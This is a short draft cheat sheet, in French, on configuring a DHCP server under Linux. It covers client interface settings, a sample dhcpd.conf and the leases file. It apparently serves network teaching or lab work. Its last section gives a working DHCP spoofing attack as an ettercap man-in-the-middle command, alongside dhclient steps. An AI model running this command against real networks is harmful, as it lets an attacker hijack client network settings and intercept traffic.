Show Menu
Cheatography

Configuration d’un Serveur DHCP sous Linux Cheat Sheet (DRAFT) by

dfqsfdfsdfqdsff

This is a draft cheat sheet. It is a work in progress and is not finished yet.
 

Config­uration IP des Clients

Dans l'interface "network", ajouter:
auto eth0
iface eth0 inet dhcp
ifdown eth0 && ifup eth0

Fichier de config­uration DHCP

Chemin : /etc/dhcp/dhcpd.conf

exemple :
default-lease-time 600;
min-lease-time 300;
max-lease-time 7200;

subnet 192.168.10.0 netmask 255.255.255.0 {
  range 192.168.10.100 192.168.10.150;

  host my_server {
    hardware ethernet a0:00:01:02:03:04;
    fixed-address 192.168.10.200;
  }

  option routers 192.168.10.1;
}
/var/l­ib/­dhc­p/d­hcp­d.l­eases contient les baux accordés

Attaque DHCP Spoofing

Relâcher la config­uration réseau
dhclient -r <if­ace>
Démarre l'inte­rface en mode débug
dhclient -d <if­ace>
Lancer l’attaque DHCP Spoofing sur client2
ettercap -Tzq -M dhcp:/­255.25­5.2­55.0­/<­IP_­DHC­P1>
Activer le client DHCP sur client1
dhclient eth0